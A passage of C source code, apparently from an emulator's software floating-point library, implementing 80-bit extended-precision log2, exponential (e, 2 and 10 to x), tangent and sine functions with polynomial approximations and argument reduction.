aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { propagateFloatx80NaNOneArg(a, status); } if (aSign == 0) { return packFloatx80(0, floatx80_infinity.high, floatx80_infinity.low); } } if (aExp == 0) { if (aSig == 0) { float_raise(float_flag_divbyzero, status); return packFloatx80(1, floatx80_infinity.high, floatx80_infinity.low); } normalizeFloatx80Subnormal(aSig, &aExp, &aSig); } if (aSign) { float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; if (aSig == one_sig) { /* X is 2^k */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = int32_to_floatx80(aExp - 0x3FFF, status); } else { fp0 = floatx80_logn(a, status); fp1 = packFloatx80(0, 0x3FFF, UINT64_C(0xB8AA3B295C17F0BC)); /* INV_L2 */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, fp1, status); /* LOGN(X)*INV_L2 */ } float_raise(float_flag_inexact, status); return a; } /* * e to x */ floatx80 floatx80_etox(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, n, j, k, m, m1; floatx80 fp0, fp1, fp2, fp3, l2, scale, adjscale; flag adjflag; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } if (aSign) { return packFloatx80(0, 0, 0); 
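/* exp(-inf) = +0; the +inf case falls through to return +inf just below. */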
} return packFloatx80(0, floatx80_infinity.high, floatx80_infinity.low); } if (aExp == 0 && aSig == 0) { return packFloatx80(0, one_exp, one_sig); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; adjflag = 0; if (aExp >= 0x3FBE) { /* |X| >= 2^(-65) */ compact = floatx80_make_compact(aExp, aSig); if (compact < 0x400CB167) { /* |X| < 16380 log2 */ fp0 = a; fp1 = a; fp0 = floatx80_mul(fp0, float32_to_floatx80( make_float32(0x42B8AA3B), status), status); /* 64/log2 * X */ adjflag = 0; n = floatx80_to_int32(fp0, status); /* int(64/log2*X) */ fp0 = int32_to_floatx80(n, status); j = n & 0x3F; /* J = N mod 64 */ m = n / 64; /* NOTE: this is really arithmetic right shift by 6 */ if (n < 0 && j) { /* * arithmetic right shift is division and * round towards minus infinity */ m--; } m += 0x3FFF; /* biased exponent of 2^(M) */ expcont1: fp2 = fp0; /* N */ fp0 = floatx80_mul(fp0, float32_to_floatx80( make_float32(0xBC317218), status), status); /* N * L1, L1 = lead(-log2/64) */ l2 = packFloatx80(0, 0x3FDC, UINT64_C(0x82E308654361C4C6)); fp2 = floatx80_mul(fp2, l2, status); /* N * L2, L1+L2 = -log2/64 */ fp0 = floatx80_add(fp0, fp1, status); /* X + N*L1 */ fp0 = floatx80_add(fp0, fp2, status); /* R */ fp1 = floatx80_mul(fp0, fp0, status); /* S = R*R */ fp2 = float32_to_floatx80(make_float32(0x3AB60B70), status); /* A5 */ fp2 = floatx80_mul(fp2, fp1, status); /* fp2 is S*A5 */ fp3 = floatx80_mul(float32_to_floatx80(make_float32(0x3C088895), status), fp1, status); /* fp3 is S*A4 */ fp2 = floatx80_add(fp2, float64_to_floatx80(make_float64( 0x3FA5555555554431), status), status); /* fp2 is A3+S*A5 */ fp3 = floatx80_add(fp3, float64_to_floatx80(make_float64( 0x3FC5555555554018), status), status); /* fp3 is A2+S*A4 */ fp2 = floatx80_mul(fp2, fp1, status); /* fp2 is S*(A3+S*A5) */ fp3 = floatx80_mul(fp3, fp1, status); /* fp3 is S*(A2+S*A4) */ fp2 = floatx80_add(fp2, float32_to_floatx80( make_float32(0x3F000000), status), status); /* fp2 is A1+S*(A3+S*A5) */ fp3 = floatx80_mul(fp3, fp0, status); /* fp3 IS R*S*(A2+S*A4) */ fp2 = floatx80_mul(fp2, fp1, status); /* fp2 IS S*(A1+S*(A3+S*A5)) */ fp0 = floatx80_add(fp0, fp3, status); /* fp0 IS R+R*S*(A2+S*A4) */ fp0 = floatx80_add(fp0, fp2, status); /* fp0 IS EXP(R) - 1 */ fp1 = exp_tbl[j]; fp0 = floatx80_mul(fp0, fp1, status); /* 2^(J/64)*(Exp(R)-1) */ fp0 = floatx80_add(fp0, float32_to_floatx80(exp_tbl2[j], status), status); /* accurate 2^(J/64) */ fp0 = floatx80_add(fp0, fp1, status); /* 2^(J/64) + 2^(J/64)*(Exp(R)-1) */ scale = packFloatx80(0, m, one_sig); if (adjflag) { adjscale = packFloatx80(0, m1, one_sig); fp0 = floatx80_mul(fp0, adjscale, status); } status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, scale, status); float_raise(float_flag_inexact, status); return a; } else { /* |X| >= 16380 log2 */ if (compact > 0x400CB27C) { /* |X| >= 16480 log2 */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; if (aSign) { a = roundAndPackFloatx80( status->floatx80_rounding_precision, 0, -0x1000, aSig, 0, status); } else { a = roundAndPackFloatx80( status->floatx80_rounding_precision, 0, 0x8000, aSig, 0, status); } float_raise(float_flag_inexact, status); return a; } else { fp0 = a; fp1 = a; fp0 = floatx80_mul(fp0, float32_to_floatx80( make_float32(0x42B8AA3B), status), status); /* 64/log2 * X */ adjflag = 1; n 
= floatx80_to_int32(fp0, status); /* int(64/log2*X) */ fp0 = int32_to_floatx80(n, status); j = n & 0x3F; /* J = N mod 64 */ /* NOTE: this is really arithmetic right shift by 6 */ k = n / 64; if (n < 0 && j) { /* arithmetic right shift is division and * round towards minus infinity */ k--; } /* NOTE: this is really arithmetic right shift by 1 */ m1 = k / 2; if (k < 0 && (k & 1)) { /* arithmetic right shift is division and * round towards minus infinity */ m1--; } m = k - m1; m1 += 0x3FFF; /* biased exponent of 2^(M1) */ m += 0x3FFF; /* biased exponent of 2^(M) */ goto expcont1; } } } else { /* |X| < 2^(-65) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(a, float32_to_floatx80(make_float32(0x3F800000), status), status); /* 1 + X */ float_raise(float_flag_inexact, status); return a; } } /* * 2 to x */ floatx80 floatx80_twotox(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, n, j, l, m, m1; floatx80 fp0, fp1, fp2, fp3, adjfact, fact1, fact2; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } if (aSign) { return packFloatx80(0, 0, 0); } return packFloatx80(0, floatx80_infinity.high, floatx80_infinity.low); } if (aExp == 0 && aSig == 0) { return packFloatx80(0, one_exp, one_sig); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; fp0 = a; compact = floatx80_make_compact(aExp, aSig); if (compact < 0x3FB98000 || compact > 0x400D80C0) { /* |X| > 16480 or |X| < 2^(-70) */ if (compact > 0x3FFF8000) { /* |X| > 16480 */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; if (aSign) { return roundAndPackFloatx80(status->floatx80_rounding_precision, 0, -0x1000, aSig, 0, status); } else { return roundAndPackFloatx80(status->floatx80_rounding_precision, 0, 0x8000, aSig, 0, status); } } else { /* |X| < 2^(-70) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, float32_to_floatx80( make_float32(0x3F800000), status), status); /* 1 + X */ float_raise(float_flag_inexact, status); return a; } } else { /* 2^(-70) <= |X| <= 16480 */ fp1 = fp0; /* X */ fp1 = floatx80_mul(fp1, float32_to_floatx80( make_float32(0x42800000), status), status); /* X * 64 */ n = floatx80_to_int32(fp1, status); fp1 = int32_to_floatx80(n, status); j = n & 0x3F; l = n / 64; /* NOTE: this is really arithmetic right shift by 6 */ if (n < 0 && j) { /* * arithmetic right shift is division and * round towards minus infinity */ l--; } m = l / 2; /* NOTE: this is really arithmetic right shift by 1 */ if (l < 0 && (l & 1)) { /* * arithmetic right shift is division and * round towards minus infinity */ m--; } m1 = l - m; m1 += 0x3FFF; /* ADJFACT IS 2^(M') */ adjfact = packFloatx80(0, m1, one_sig); fact1 = exp2_tbl[j]; fact1.high += m; fact2.high = exp2_tbl2[j] >> 16; fact2.high += m; fact2.low = (uint64_t)(exp2_tbl2[j] & 0xFFFF); fact2.low <<= 48; fp1 = floatx80_mul(fp1, float32_to_floatx80( make_float32(0x3C800000), status), status); /* (1/64)*N */ fp0 = floatx80_sub(fp0, fp1, status); /* X - (1/64)*INT(64 X) */ fp2 = packFloatx80(0, 0x3FFE, UINT64_C(0xB17217F7D1CF79AC)); /* LOG2 */ fp0 = 
floatx80_mul(fp0, fp2, status); /* R */ /* EXPR */ fp1 = floatx80_mul(fp0, fp0, status); /* S = R*R */ fp2 = float64_to_floatx80(make_float64(0x3F56C16D6F7BD0B2), status); /* A5 */ fp3 = float64_to_floatx80(make_float64(0x3F811112302C712C), status); /* A4 */ fp2 = floatx80_mul(fp2, fp1, status); /* S*A5 */ fp3 = floatx80_mul(fp3, fp1, status); /* S*A4 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3FA5555555554CC1), status), status); /* A3+S*A5 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0x3FC5555555554A54), status), status); /* A2+S*A4 */ fp2 = floatx80_mul(fp2, fp1, status); /* S*(A3+S*A5) */ fp3 = floatx80_mul(fp3, fp1, status); /* S*(A2+S*A4) */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3FE0000000000000), status), status); /* A1+S*(A3+S*A5) */ fp3 = floatx80_mul(fp3, fp0, status); /* R*S*(A2+S*A4) */ fp2 = floatx80_mul(fp2, fp1, status); /* S*(A1+S*(A3+S*A5)) */ fp0 = floatx80_add(fp0, fp3, status); /* R+R*S*(A2+S*A4) */ fp0 = floatx80_add(fp0, fp2, status); /* EXP(R) - 1 */ fp0 = floatx80_mul(fp0, fact1, status); fp0 = floatx80_add(fp0, fact2, status); fp0 = floatx80_add(fp0, fact1, status); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, adjfact, status); float_raise(float_flag_inexact, status); return a; } } /* * 10 to x */ floatx80 floatx80_tentox(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, n, j, l, m, m1; floatx80 fp0, fp1, fp2, fp3, adjfact, fact1, fact2; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } if (aSign) { return packFloatx80(0, 0, 0); } return packFloatx80(0, floatx80_infinity.high, floatx80_infinity.low); } if (aExp == 0 && aSig == 0) { return packFloatx80(0, one_exp, one_sig); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; fp0 = a; compact = floatx80_make_compact(aExp, aSig); if (compact < 0x3FB98000 || compact > 0x400B9B07) { /* |X| > 16480 LOG2/LOG10 or |X| < 2^(-70) */ if (compact > 0x3FFF8000) { /* |X| > 16480 */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; if (aSign) { return roundAndPackFloatx80(status->floatx80_rounding_precision, 0, -0x1000, aSig, 0, status); } else { return roundAndPackFloatx80(status->floatx80_rounding_precision, 0, 0x8000, aSig, 0, status); } } else { /* |X| < 2^(-70) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, float32_to_floatx80( make_float32(0x3F800000), status), status); /* 1 + X */ float_raise(float_flag_inexact, status); return a; } } else { /* 2^(-70) <= |X| <= 16480 LOG 2 / LOG 10 */ fp1 = fp0; /* X */ fp1 = floatx80_mul(fp1, float64_to_floatx80( make_float64(0x406A934F0979A371), status), status); /* X*64*LOG10/LOG2 */ n = floatx80_to_int32(fp1, status); /* N=INT(X*64*LOG10/LOG2) */ fp1 = int32_to_floatx80(n, status); j = n & 0x3F; l = n / 64; /* NOTE: this is really arithmetic right shift by 6 */ if (n < 0 && j) { /* * arithmetic right shift is division and * round towards minus infinity */ l--; } m = l / 2; /* NOTE: this is really arithmetic right shift by 1 */ if (l < 0 && (l & 1)) { /* * arithmetic 
right shift is division and * round towards minus infinity */ m--; } m1 = l - m; m1 += 0x3FFF; /* ADJFACT IS 2^(M') */ adjfact = packFloatx80(0, m1, one_sig); fact1 = exp2_tbl[j]; fact1.high += m; fact2.high = exp2_tbl2[j] >> 16; fact2.high += m; fact2.low = (uint64_t)(exp2_tbl2[j] & 0xFFFF); fact2.low <<= 48; fp2 = fp1; /* N */ fp1 = floatx80_mul(fp1, float64_to_floatx80( make_float64(0x3F734413509F8000), status), status); /* N*(LOG2/64LOG10)_LEAD */ fp3 = packFloatx80(1, 0x3FCD, UINT64_C(0xC0219DC1DA994FD2)); fp2 = floatx80_mul(fp2, fp3, status); /* N*(LOG2/64LOG10)_TRAIL */ fp0 = floatx80_sub(fp0, fp1, status); /* X - N L_LEAD */ fp0 = floatx80_sub(fp0, fp2, status); /* X - N L_TRAIL */ fp2 = packFloatx80(0, 0x4000, UINT64_C(0x935D8DDDAAA8AC17)); /* LOG10 */ fp0 = floatx80_mul(fp0, fp2, status); /* R */ /* EXPR */ fp1 = floatx80_mul(fp0, fp0, status); /* S = R*R */ fp2 = float64_to_floatx80(make_float64(0x3F56C16D6F7BD0B2), status); /* A5 */ fp3 = float64_to_floatx80(make_float64(0x3F811112302C712C), status); /* A4 */ fp2 = floatx80_mul(fp2, fp1, status); /* S*A5 */ fp3 = floatx80_mul(fp3, fp1, status); /* S*A4 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3FA5555555554CC1), status), status); /* A3+S*A5 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0x3FC5555555554A54), status), status); /* A2+S*A4 */ fp2 = floatx80_mul(fp2, fp1, status); /* S*(A3+S*A5) */ fp3 = floatx80_mul(fp3, fp1, status); /* S*(A2+S*A4) */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3FE0000000000000), status), status); /* A1+S*(A3+S*A5) */ fp3 = floatx80_mul(fp3, fp0, status); /* R*S*(A2+S*A4) */ fp2 = floatx80_mul(fp2, fp1, status); /* S*(A1+S*(A3+S*A5)) */ fp0 = floatx80_add(fp0, fp3, status); /* R+R*S*(A2+S*A4) */ fp0 = floatx80_add(fp0, fp2, status); /* EXP(R) - 1 */ fp0 = floatx80_mul(fp0, fact1, status); fp0 = floatx80_add(fp0, fact2, status); fp0 = floatx80_add(fp0, fact1, status); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, adjfact, status); float_raise(float_flag_inexact, status); return a; } } /* * Tangent */ floatx80 floatx80_tan(floatx80 a, float_status *status) { flag aSign, xSign; int32_t aExp, xExp; uint64_t aSig, xSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, l, n, j; floatx80 fp0, fp1, fp2, fp3, fp4, fp5, invtwopi, twopi1, twopi2; float32 twoto63; flag endflag; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } if (aExp == 0 && aSig == 0) { return packFloatx80(aSign, 0, 0); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; compact = floatx80_make_compact(aExp, aSig); fp0 = a; if (compact < 0x3FD78000 || compact > 0x4004BC7E) { /* 2^(-40) > |X| > 15 PI */ if (compact > 0x3FFF8000) { /* |X| >= 15 PI */ /* REDUCEX */ fp1 = packFloatx80(0, 0, 0); if (compact == 0x7FFEFFFF) { twopi1 = packFloatx80(aSign ^ 1, 0x7FFE, UINT64_C(0xC90FDAA200000000)); twopi2 = packFloatx80(aSign ^ 1, 0x7FDC, UINT64_C(0x85A308D300000000)); fp0 = floatx80_add(fp0, twopi1, status); fp1 = fp0; fp0 = floatx80_add(fp0, twopi2, status); fp1 = floatx80_sub(fp1, fp0, status); fp1 = floatx80_add(fp1, twopi2, status); } loop: xSign = 
extractFloatx80Sign(fp0); xExp = extractFloatx80Exp(fp0); xExp -= 0x3FFF; if (xExp <= 28) { l = 0; endflag = 1; } else { l = xExp - 27; endflag = 0; } invtwopi = packFloatx80(0, 0x3FFE - l, UINT64_C(0xA2F9836E4E44152A)); /* INVTWOPI */ twopi1 = packFloatx80(0, 0x3FFF + l, UINT64_C(0xC90FDAA200000000)); twopi2 = packFloatx80(0, 0x3FDD + l, UINT64_C(0x85A308D300000000)); /* SIGN(INARG)*2^63 IN SGL */ twoto63 = packFloat32(xSign, 0xBE, 0); fp2 = floatx80_mul(fp0, invtwopi, status); fp2 = floatx80_add(fp2, float32_to_floatx80(twoto63, status), status); /* THE FRACT PART OF FP2 IS ROUNDED */ fp2 = floatx80_sub(fp2, float32_to_floatx80(twoto63, status), status); /* FP2 is N */ fp4 = floatx80_mul(twopi1, fp2, status); /* W = N*P1 */ fp5 = floatx80_mul(twopi2, fp2, status); /* w = N*P2 */ fp3 = floatx80_add(fp4, fp5, status); /* FP3 is P */ fp4 = floatx80_sub(fp4, fp3, status); /* W-P */ fp0 = floatx80_sub(fp0, fp3, status); /* FP0 is A := R - P */ fp4 = floatx80_add(fp4, fp5, status); /* FP4 is p = (W-P)+w */ fp3 = fp0; /* FP3 is A */ fp1 = floatx80_sub(fp1, fp4, status); /* FP1 is a := r - p */ fp0 = floatx80_add(fp0, fp1, status); /* FP0 is R := A+a */ if (endflag > 0) { n = floatx80_to_int32(fp2, status); goto tancont; } fp3 = floatx80_sub(fp3, fp0, status); /* A-R */ fp1 = floatx80_add(fp1, fp3, status); /* FP1 is r := (A-R)+a */ goto loop; } else { status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_move(a, status); float_raise(float_flag_inexact, status); return a; } } else { fp1 = floatx80_mul(fp0, float64_to_floatx80( make_float64(0x3FE45F306DC9C883), status), status); /* X*2/PI */ n = floatx80_to_int32(fp1, status); j = 32 + n; fp0 = floatx80_sub(fp0, pi_tbl[j], status); /* X-Y1 */ fp0 = floatx80_sub(fp0, float32_to_floatx80(pi_tbl2[j], status), status); /* FP0 IS R = (X-Y1)-Y2 */ tancont: if (n & 1) { /* NODD */ fp1 = fp0; /* R */ fp0 = floatx80_mul(fp0, fp0, status); /* S = R*R */ fp3 = float64_to_floatx80(make_float64(0x3EA0B759F50F8688), status); /* Q4 */ fp2 = float64_to_floatx80(make_float64(0xBEF2BAA5A8924F04), status); /* P3 */ fp3 = floatx80_mul(fp3, fp0, status); /* SQ4 */ fp2 = floatx80_mul(fp2, fp0, status); /* SP3 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBF346F59B39BA65F), status), status); /* Q3+SQ4 */ fp4 = packFloatx80(0, 0x3FF6, UINT64_C(0xE073D3FC199C4A00)); fp2 = floatx80_add(fp2, fp4, status); /* P2+SP3 */ fp3 = floatx80_mul(fp3, fp0, status); /* S(Q3+SQ4) */ fp2 = floatx80_mul(fp2, fp0, status); /* S(P2+SP3) */ fp4 = packFloatx80(0, 0x3FF9, UINT64_C(0xD23CD68415D95FA1)); fp3 = floatx80_add(fp3, fp4, status); /* Q2+S(Q3+SQ4) */ fp4 = packFloatx80(1, 0x3FFC, UINT64_C(0x8895A6C5FB423BCA)); fp2 = floatx80_add(fp2, fp4, status); /* P1+S(P2+SP3) */ fp3 = floatx80_mul(fp3, fp0, status); /* S(Q2+S(Q3+SQ4)) */ fp2 = floatx80_mul(fp2, fp0, status); /* S(P1+S(P2+SP3)) */ fp4 = packFloatx80(1, 0x3FFD, UINT64_C(0xEEF57E0DA84BC8CE)); fp3 = floatx80_add(fp3, fp4, status); /* Q1+S(Q2+S(Q3+SQ4)) */ fp2 = floatx80_mul(fp2, fp1, status); /* RS(P1+S(P2+SP3)) */ fp0 = floatx80_mul(fp0, fp3, status); /* S(Q1+S(Q2+S(Q3+SQ4))) */ fp1 = floatx80_add(fp1, fp2, status); /* R+RS(P1+S(P2+SP3)) */ fp0 = floatx80_add(fp0, float32_to_floatx80( make_float32(0x3F800000), status), status); /* 1+S(Q1+S(Q2+S(Q3+SQ4))) */ xSign = extractFloatx80Sign(fp1); xExp = extractFloatx80Exp(fp1); xSig = extractFloatx80Frac(fp1); xSign ^= 1; fp1 = packFloatx80(xSign, xExp, xSig); status->float_rounding_mode = user_rnd_mode; 
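/* N odd: this path effectively computes -1/tan(R); fp1's sign bit was flipped above, so the quotient below comes out with the correct sign. */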
status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_div(fp0, fp1, status); float_raise(float_flag_inexact, status); return a; } else { fp1 = floatx80_mul(fp0, fp0, status); /* S = R*R */ fp3 = float64_to_floatx80(make_float64(0x3EA0B759F50F8688), status); /* Q4 */ fp2 = float64_to_floatx80(make_float64(0xBEF2BAA5A8924F04), status); /* P3 */ fp3 = floatx80_mul(fp3, fp1, status); /* SQ4 */ fp2 = floatx80_mul(fp2, fp1, status); /* SP3 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBF346F59B39BA65F), status), status); /* Q3+SQ4 */ fp4 = packFloatx80(0, 0x3FF6, UINT64_C(0xE073D3FC199C4A00)); fp2 = floatx80_add(fp2, fp4, status); /* P2+SP3 */ fp3 = floatx80_mul(fp3, fp1, status); /* S(Q3+SQ4) */ fp2 = floatx80_mul(fp2, fp1, status); /* S(P2+SP3) */ fp4 = packFloatx80(0, 0x3FF9, UINT64_C(0xD23CD68415D95FA1)); fp3 = floatx80_add(fp3, fp4, status); /* Q2+S(Q3+SQ4) */ fp4 = packFloatx80(1, 0x3FFC, UINT64_C(0x8895A6C5FB423BCA)); fp2 = floatx80_add(fp2, fp4, status); /* P1+S(P2+SP3) */ fp3 = floatx80_mul(fp3, fp1, status); /* S(Q2+S(Q3+SQ4)) */ fp2 = floatx80_mul(fp2, fp1, status); /* S(P1+S(P2+SP3)) */ fp4 = packFloatx80(1, 0x3FFD, UINT64_C(0xEEF57E0DA84BC8CE)); fp3 = floatx80_add(fp3, fp4, status); /* Q1+S(Q2+S(Q3+SQ4)) */ fp2 = floatx80_mul(fp2, fp0, status); /* RS(P1+S(P2+SP3)) */ fp1 = floatx80_mul(fp1, fp3, status); /* S(Q1+S(Q2+S(Q3+SQ4))) */ fp0 = floatx80_add(fp0, fp2, status); /* R+RS(P1+S(P2+SP3)) */ fp1 = floatx80_add(fp1, float32_to_floatx80( make_float32(0x3F800000), status), status); /* 1+S(Q1+S(Q2+S(Q3+SQ4))) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_div(fp0, fp1, status); float_raise(float_flag_inexact, status); return a; } } } /* * Sine */ floatx80 floatx80_sin(floatx80 a, float_status *status) { flag aSign, xSign; int32_t aExp, xExp; uint64_t aSig, xSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, l, n, j; floatx80 fp0, fp1, fp2, fp3, fp4, fp5, x, invtwopi, twopi1, twopi2; float32 posneg1, twoto63; flag endflag; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } if (aExp == 0 && aSig == 0) { return packFloatx80(aSign, 0, 0); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; compact = floatx80_make_compact(aExp, aSig); fp0 = a; if (compact < 0x3FD78000 || compact > 0x4004BC7E) { /* 2^(-40) > |X| > 15 PI */ if (compact > 0x3FFF8000) { /* |X| >= 15 PI */ /* REDUCEX */ fp1 = packFloatx80(0, 0, 0); if (compact == 0x7FFEFFFF) { twopi1 = packFloatx80(aSign ^ 1, 0x7FFE, UINT64_C(0xC90FDAA200000000)); twopi2 = packFloatx80(aSign ^ 1, 0x7FDC, UINT64_C(0x85A308D300000000)); fp0 = floatx80_add(fp0, twopi1, status); fp1 = fp0; fp0 = floatx80_add(fp0, twopi2, status); fp1 = floatx80_sub(fp1, fp0, status); fp1 = floatx80_add(fp1, twopi2, status); } loop: xSign = extractFloatx80Sign(fp0); xExp = extractFloatx80Exp(fp0); xExp -= 0x3FFF; if (xExp <= 28) { l = 0; endflag = 1; } else { l = xExp - 27; endflag = 0; } invtwopi = packFloatx80(0, 0x3FFE - l, UINT64_C(0xA2F9836E4E44152A)); /* INVTWOPI */ twopi1 = packFloatx80(0, 0x3FFF + l, UINT64_C(0xC90FDAA200000000)); twopi2 = packFloatx80(0, 0x3FDD + l, 
UINT64_C(0x85A308D300000000)); /* SIGN(INARG)*2^63 IN SGL */ twoto63 = packFloat32(xSign, 0xBE, 0); fp2 = floatx80_mul(fp0, invtwopi, status); fp2 = floatx80_add(fp2, float32_to_floatx80(twoto63, status), status); /* THE FRACT PART OF FP2 IS ROUNDED */ fp2 = floatx80_sub(fp2, float32_to_floatx80(twoto63, status), status); /* FP2 is N */ fp4 = floatx80_mul(twopi1, fp2, status); /* W = N*P1 */ fp5 = floatx80_mul(twopi2, fp2, status); /* w = N*P2 */ fp3 = floatx80_add(fp4, fp5, status); /* FP3 is P */ fp4 = floatx80_sub(fp4, fp3, status); /* W-P */ fp0 = floatx80_sub(fp0, fp3, status); /* FP0 is A := R - P */ fp4 = floatx80_add(fp4, fp5, status); /* FP4 is p = (W-P)+w */ fp3 = fp0; /* FP3 is A */ fp1 = floatx80_sub(fp1, fp4, status); /* FP1 is a := r - p */ fp0 = floatx80_add(fp0, fp1, status); /* FP0 is R := A+a */ if (endflag > 0) { n = floatx80_to_int32(fp2, status); goto sincont; } fp3 = floatx80_sub(fp3, fp0, status); /* A-R */ fp1 = floatx80_add(fp1, fp3, status); /* FP1 is r := (A-R)+a */ goto loop; } else { /* SINSM */ fp0 = float32_to_floatx80(make_float32(0x3F800000), status); /* 1 */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; /* SINTINY */ a = floatx80_move(a, status); float_raise(float_flag_inexact, status); return a; } } else { fp1 = floatx80_mul(fp0, float64_to_floatx80( make_float64(0x3FE45F306DC9C883), status), status); /* X*2/PI */ n = floatx80_to_int32(fp1, status); j = 32 + n; fp0 = floatx80_sub(fp0, pi_tbl[j], status); /* X-Y1 */ fp0 = floatx80_sub(fp0, float32_to_floatx80(pi_tbl2[j], status), status); /* FP0 IS R = (X-Y1)-Y2 */ sincont: if (n & 1) { /* COSPOLY */ fp0 = floatx80_mul(fp0, fp0, status); /* FP0 IS S */ fp1 = floatx80_mul(fp0, fp0, status); /* FP1 IS T */ fp2 = float64_to_floatx80(make_float64(0x3D2AC4D0D6011EE3), status); /* B8 */ fp3 = float64_to_floatx80(make_float64(0xBDA9396F9F45AC19), status); /* B7 */ xSign = extractFloatx80Sign(fp0); /* X IS S */ xExp = extractFloatx80Exp(fp0); xSig = extractFloatx80Frac(fp0); if ((n >> 1) & 1) { xSign ^= 1; posneg1 = make_float32(0xBF800000); /* -1 */ } else { xSign ^= 0; posneg1 = make_float32(0x3F800000); /* 1 */ } /* X IS NOW R'= SGN*R */ fp2 = floatx80_mul(fp2, fp1, status); /* TB8 */ fp3 = floatx80_mul(fp3, fp1, status); /* TB7 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3E21EED90612C972), status), status); /* B6+TB8 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBE927E4FB79D9FCF), status), status); /* B5+TB7 */ fp2 = floatx80_mul(fp2, fp1, status); /* T(B6+TB8) */ fp3 = floatx80_mul(fp3, fp1, status); /* T(B5+TB7) */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3EFA01A01A01D423), status), status); /* B4+T(B6+TB8) */ fp4 = packFloatx80(1, 0x3FF5, UINT64_C(0xB60B60B60B61D438)); fp3 = floatx80_add(fp3, fp4, status); /* B3+T(B5+TB7) */ fp2 = floatx80_mul(fp2, fp1, status); /* T(B4+T(B6+TB8)) */ fp1 = floatx80_mul(fp1, fp3, status); /* T(B3+T(B5+TB7)) */ fp4 = packFloatx80(0, 0x3FFA, UINT64_C(0xAAAAAAAAAAAAAB5E)); fp2 = floatx80_add(fp2, fp4, status); /* B2+T(B4+T(B6+TB8)) */ fp1 = floatx80_add(fp1, float32_to_floatx80( make_float32(0xBF000000), status), status); /* B1+T(B3+T(B5+TB7)) */ fp0 = 